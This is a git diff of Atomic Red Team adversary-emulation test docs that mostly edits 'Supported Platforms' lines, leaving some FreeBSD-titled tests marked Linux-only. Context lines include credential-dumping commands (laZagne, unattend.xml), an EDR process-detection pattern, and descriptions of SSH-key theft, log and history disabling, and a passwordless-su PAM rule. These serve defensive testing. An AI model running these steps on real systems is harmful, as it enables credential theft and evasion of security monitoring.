Chrome/Chromium developer mode and Load Extension found in the src directory -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 @@ -58,7 +58,7 @@ tick 'Developer Mode'. ## Atomic Test #2 - Chrome/Chromium (Chrome Web Store) Install the "Minimum Viable Malicious Extension" Chrome extension -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f @@ -85,7 +85,7 @@ in Chrome ## Atomic Test #3 - Firefox Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938 diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index ccaa7f00a9..230ac5e859 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -66,7 +66,7 @@ cat /etc/pam.d/common-password ## Atomic Test #2 - Examine password complexity policy - FreeBSD Lists the password complexity policy to console on FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a7893624-a3d7-4aed-9676-80498f31820f diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index f702b511f7..02df80778f 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -32,7 +32,7 @@ Specific storage locations vary based on platform and/or application, but browse ## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux Searches for Mozilla Firefox's places.sqlite file (on FreeBSD or Linux distributions) that contains bookmarks and lists any found instances to a text file. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2 @@ -146,7 +146,7 @@ rm -f #{output_file} 2>/dev/null ## Atomic Test #4 - List Google Chromium Bookmark JSON Files on FreeBSD Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 88ca025b-3040-44eb-9168-bd8af22b82fa diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 8a76148364..2de8de06cb 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -42,7 +42,7 @@ Adversarial may use these commands to make themselves the owner of files and dir ## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) Changes a file or folder's permissions using chmod and a specified numeric mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135 @@ -76,7 +76,7 @@ chmod #{numeric_mode} #{file_or_folder} ## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) Changes a file or folder's permissions using chmod and a specified symbolic mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3 @@ -110,7 +110,7 @@ chmod #{symbolic_mode} #{file_or_folder} ## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively Changes a file or folder's permissions recursively using chmod and a specified numeric mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4 @@ -144,7 +144,7 @@ chmod -R #{numeric_mode} #{file_or_folder} ## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f @@ -248,7 +248,7 @@ chown -R #{owner}:#{group} #{file_or_folder} ## Atomic Test #7 - chown - Change file or folder mode ownership only Changes a file or folder's ownership only using chown. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99 @@ -351,7 +351,7 @@ chattr -i #{file_to_modify} Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 60eee3ea-2ebd-453b-a666-c52ce08d2709 @@ -432,7 +432,7 @@ gcc #{source_file} -o #{compiled_file} ## Atomic Test #12 - Chmod through c script (freebsd) chmods a file using a c script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** da40b5fe-3098-4b3b-a410-ff177e49ee2e @@ -524,7 +524,7 @@ gcc #{source_file} -o #{compiled_file} ## Atomic Test #14 - Chown through c script (freebsd) chowns a file to root using a c script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** eb577a19-b730-4918-9b03-c5edcf51dc4e diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 4bf73aa283..3313bfc479 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -76,7 +76,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" -Force Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146 diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 7ae1d739f1..bb7bca004a 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -32,7 +32,7 @@ In cloud environments, storage objects within compromised accounts may also be e ## Atomic Test #1 - Encrypt files using gpg (FreeBSD/Linux) Uses gpg to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765 @@ -84,7 +84,7 @@ which_gpg=`which gpg` ## Atomic Test #2 - Encrypt files using 7z (FreeBSD/Linux) Uses 7z to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad @@ -136,7 +136,7 @@ which_7z=`which 7z` ## Atomic Test #3 - Encrypt files using ccrypt (FreeBSD/Linux) Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f @@ -190,7 +190,7 @@ if [ $USER == "root" ]; then cp #{root_input_file_path} #{cped_file_path}; else ## Atomic Test #4 - Encrypt files using openssl (FreeBSD/Linux) Uses openssl to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1 diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 66dfd4f1a7..eab432f273 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -19,7 +19,7 @@ Adversaries may also use malware that leverages a system's network bandwidth as This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549 diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index eb85c3979f..8ef21e3dc6 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -59,7 +59,7 @@ if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|V Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** e129d73b-3e03-4ae9-bf1e-67fc8921e0fd diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 2000944acc..a9677d0b6a 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -179,7 +179,7 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat| Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** fa96c21c-5fd6-4428-aa28-51a2fbecdbdc diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 4ffb278f79..1e03f270e5 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -104,7 +104,7 @@ shutdown /r /t #{timeout} ## Atomic Test #3 - Restart System via `shutdown` - FreeBSD/macOS/Linux This test restarts a FreeBSD/macOS/Linux system. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb @@ -137,7 +137,7 @@ shutdown -r #{timeout} ## Atomic Test #4 - Shutdown System via `shutdown` - FreeBSD/macOS/Linux This test shuts down a FreeBSD/macOS/Linux system using a halt. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de @@ -170,7 +170,7 @@ shutdown -h #{timeout} ## Atomic Test #5 - Restart System via `reboot` - FreeBSD/macOS/Linux This test restarts a FreeBSD/macOS/Linux system via `reboot`. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027 @@ -198,7 +198,7 @@ reboot ## Atomic Test #6 - Shutdown System via `halt` - FreeBSD/Linux This test shuts down a FreeBSD/Linux system using `halt`. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd @@ -226,7 +226,7 @@ halt -p ## Atomic Test #7 - Reboot System via `halt` - FreeBSD This test restarts a FreeBSD system using `halt`. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 7b1cee42-320f-4890-b056-d65c8b884ba5 @@ -282,7 +282,7 @@ halt --reboot ## Atomic Test #9 - Shutdown System via `poweroff` - FreeBSD/Linux This test shuts down a FreeBSD/Linux system using `poweroff`. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa @@ -310,7 +310,7 @@ poweroff ## Atomic Test #10 - Reboot System via `poweroff` - FreeBSD This test restarts a FreeBSD system using `poweroff`. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 5a282e50-86ff-438d-8cef-8ae01c9e62e1 diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 003788cfa1..c5b83f5ca0 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -91,7 +91,7 @@ systemctl daemon-reload ## Atomic Test #2 - Create SysV Service This test creates a SysV service unit file and enables it as a service. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 760fe8d2-79d9-494f-905e-a239a3df86f6 diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index c41cc67ae9..429f16b50d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -104,7 +104,7 @@ mv /tmp/T1546.004 ~/.bashrc ## Atomic Test #3 - Add command to .shrc Adds a command to the .shrc file of the current user -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 41502021-591a-4649-8b6e-83c9192aff53 @@ -142,7 +142,7 @@ mv /tmp/T1546.004 ~/.shrc ## Atomic Test #4 - Append to the system shell profile An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time "any" user logs in. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 694b3cc8-6a78-4d35-9e74-0123d009e94b @@ -179,7 +179,7 @@ sed -i "s/# Atomic Red Team was here! T1546.004//" /etc/profile ## Atomic Test #5 - Append commands user shell profile An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the "user" logs in. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index bc9d7f2f7c..5908cf1f35 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -54,7 +54,7 @@ rm -f /tmp/art-fish.txt Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** be1a5d70-6865-44aa-ab50-42244c9fd16f @@ -132,7 +132,7 @@ rm -f /tmp/art-fish.txt Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** ade10242-1eac-43df-8412-be0d4c704ada diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index df89ae35bf..1b8725b0db 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -79,7 +79,7 @@ sudo rm /tmp/hello.c ## Atomic Test #2 - Make and modify binary from C source (freebsd) Make, change owner, and change file attributes on a C source code file -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** dd580455-d84b-481b-b8b0-ac96f3b1dc4c @@ -161,7 +161,7 @@ sudo rm #{file_to_setuid} ## Atomic Test #4 - Set a SetUID flag on file (freebsd) This test sets the SetUID flag on a file in FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 9be9b827-ff47-4e1b-bef8-217db6fb7283 @@ -239,7 +239,7 @@ sudo rm #{file_to_setuid} ## Atomic Test #6 - Set a SetGID flag on file (freebsd) This test sets the SetGID flag on a file in FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 1f73af33-62a8-4bf1-bd10-3bea931f2c0d @@ -359,7 +359,7 @@ rm #{file_to_setcap} ## Atomic Test #9 - Do reconnaissance for files that have the setuid bit set This test simulates a command that can be run to enumerate files that have the setuid bit set -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 8e36da01-cd29-45fd-be72-8a0fcaad4481 @@ -387,7 +387,7 @@ find /usr/bin -perm -4000 ## Atomic Test #10 - Do reconnaissance for files that have the setgid bit set This test simulates a command that can be run to enumerate files that have the setgid bit set -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 3fb46e17-f337-4c14-9f9a-a471946533e2 diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index 4cee7af8ca..7dd6d38e96 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -60,7 +60,7 @@ sudo vim /etc/sudoers ## Atomic Test #2 - Sudo usage (freebsd) Common Sudo enumeration methods. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 2bf9a018-4664-438a-b435-cc6f8c6f71b1 @@ -131,7 +131,7 @@ sudo visudo -c -f /etc/sudoers ## Atomic Test #4 - Unlimited sudo cache timeout (freebsd) Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a83ad6e8-6f24-4d7f-8f44-75f8ab742991 @@ -201,7 +201,7 @@ sudo visudo -c -f /etc/sudoers ## Atomic Test #6 - Disable tty_tickets for sudo caching (freebsd) Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 4df6a0fe-2bdd-4be8-8618-a6a19654a57a diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 4d9ece4483..ab8ce7667a 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -38,7 +38,7 @@ In cloud and/or containerized environments, authenticated user and service accou ## Atomic Test #1 - Find AWS credentials Find local AWS credentials from file, defaults to using / as the look path. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** macOS, Linux **auto_generated_guid:** 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 @@ -99,7 +99,7 @@ python2 laZagne.py all ## Atomic Test #3 - Extract passwords with grep Extracting credentials from files -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4 @@ -192,7 +192,7 @@ type C:\Windows\Panther\Unattend\unattend.xml ## Atomic Test #6 - Find and Access Github Credentials This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803 diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index 9fdb872eab..5bb0dcc97b 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -49,7 +49,7 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} ## Atomic Test #2 - Search Through sh History Search through sh history for specifice commands we want to capture -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** d87d3b94-05b4-40f2-a80f-99864ffa6803 diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 241f8914f3..32415d148c 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -75,7 +75,7 @@ dir c:\ /b /s .key | findstr /e .key ## Atomic Test #2 - Discover Private SSH Keys Discover private SSH keys on a FreeBSD, macOS or Linux system. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878 @@ -154,7 +154,7 @@ rm -rf #{output_folder} ## Atomic Test #4 - Copy Private SSH Keys with CP (freebsd) Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 12e4a260-a7fd-4ed8-bf18-1a28c1395775 @@ -245,7 +245,7 @@ rm -rf #{output_folder} ## Atomic Test #6 - Copy Private SSH Keys with rsync (freebsd) Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 922b1080-0b95-42b0-9585-b9a5ea0af044 @@ -336,7 +336,7 @@ rm -rf #{output_folder} ## Atomic Test #8 - Copy the users GnuPG directory with rsync (freebsd) Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b05ac39b-515f-48e9-88e9-2f141b5bcad0 diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 5ac53b6559..462f52e5e0 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -74,7 +74,7 @@ update-ca-trust ## Atomic Test #2 - Install root CA on FreeBSD Creates a root CA with openssl -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** f4568003-1438-44ab-a234-b3252ea7e7a3 diff --git a/atomics/T1556.003/T1556.003.md b/atomics/T1556.003/T1556.003.md index 68aec219e8..04cf236981 100644 --- a/atomics/T1556.003/T1556.003.md +++ b/atomics/T1556.003/T1556.003.md @@ -63,7 +63,7 @@ Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b17eacac-282d-4ca8-a240-46602cf863e3 diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 529e832962..365a35ba1d 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -308,7 +308,7 @@ echo Please set input_files argument to include files that exist ## Atomic Test #6 - Data Compressed - nix - gzip Single File An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af @@ -346,7 +346,7 @@ rm -f #{input_file}.gz ## Atomic Test #7 - Data Compressed - nix - tar Folder or File An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a @@ -396,7 +396,7 @@ mkdir -p #{input_file_folder} && touch #{input_file_folder}/file1 ## Atomic Test #8 - Data Encrypted with zip and gpg symmetric Encrypt data for exiltration -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index b3c6d38641..d51cbe97c4 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -20,7 +20,7 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and ## Atomic Test #1 - Compressing data using GZip in Python (FreeBSD/Linux) Uses GZip from Python to compress files -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8 @@ -71,7 +71,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #2 - Compressing data using bz2 in Python (FreeBSD/Linux) Uses bz2 from Python to compress files -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d @@ -122,7 +122,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #3 - Compressing data using zipfile in Python (FreeBSD/Linux) Uses zipfile from Python to compress files -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0 @@ -173,7 +173,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #4 - Compressing data using tarfile in Python (FreeBSD/Linux) Uses tarfile from Python to compress files -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index 71c309bb74..1cf299d8a2 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -166,7 +166,7 @@ sudo #{package_installer} ## Atomic Test #2 - Disable syslog (freebsd) Disables syslog collection -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** db9de996-441e-4ae0-947b-61b6871e2fdf @@ -1763,7 +1763,7 @@ echo 3> /proc/sys/vm/drop_caches disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** e74e4c63-6fde-4ad2-9ee8-21c3a1733114 diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index c13a471ed8..255a8b243a 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -72,7 +72,7 @@ export HISTCONTROL=ignoreboth ## Atomic Test #2 - Disable history collection (freebsd) Disables history collection in shells -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** cada55b4-8251-4c60-819e-8ec1b33c9306 @@ -262,7 +262,7 @@ An Adversary may set the sh history files size environment variable (HISTSIZE) t Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 386d3850-2ce7-4508-b56b-c0558922c814 @@ -337,7 +337,7 @@ An Adversary may clear, unset or redirect the history environment variable HISTF Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** f7308845-6da8-468e-99f2-4271f2f5bb67 diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index f34f892bd9..7b148c4874 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -312,7 +312,7 @@ echo "" ## Atomic Test #8 - Stop/Start Packet Filter Stop the Packet Filter if installed. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 @@ -500,7 +500,7 @@ echo "" ## Atomic Test #12 - Add and delete Packet Filter rules Add and delete a rule on the Packet Filter (PF) if installed and enabled. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 8b23cae1-66c1-41c5-b79d-e095b6098b5b diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md index 7fe62ba9ef..16669025d9 100644 --- a/atomics/T1562.006/T1562.006.md +++ b/atomics/T1562.006/T1562.006.md @@ -85,7 +85,7 @@ sed -i '$ d' /etc/#{libaudit_config_file_name} ## Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host Emulates modification of auditd configuration files -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** cedaf7e7-28ee-42ab-ba13-456abd35d1bd @@ -177,7 +177,7 @@ fi ## Atomic Test #4 - Logging Configuration Changes on FreeBSD Host Emulates modification of syslog configuration. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index ff7901b5e6..163dc624bf 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md @@ -36,7 +36,7 @@ Adversaries can use this to their advantage to hide files and folders anywhere o ## Atomic Test #1 - Create a hidden file in a hidden directory Creates a hidden file inside a hidden directory -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index c89137e316..bb276603cd 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -51,7 +51,7 @@ Test-NetConnection -ComputerName #{domain} -port #{port} ## Atomic Test #2 - Testing usage of uncommonly used port Testing uncommonly used port utilizing telnet. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767 diff --git a/atomics/T1614.001/T1614.001.md b/atomics/T1614.001/T1614.001.md index b9215bb60d..c4b136a4b6 100644 --- a/atomics/T1614.001/T1614.001.md +++ b/atomics/T1614.001/T1614.001.md @@ -91,7 +91,7 @@ Identify System language with the `locale` command. Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 837d609b-845e-4519-90ce-edc3b4b0e138 @@ -203,7 +203,7 @@ Note: `env` and `printenv` will usually provide the same results. `set` is also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a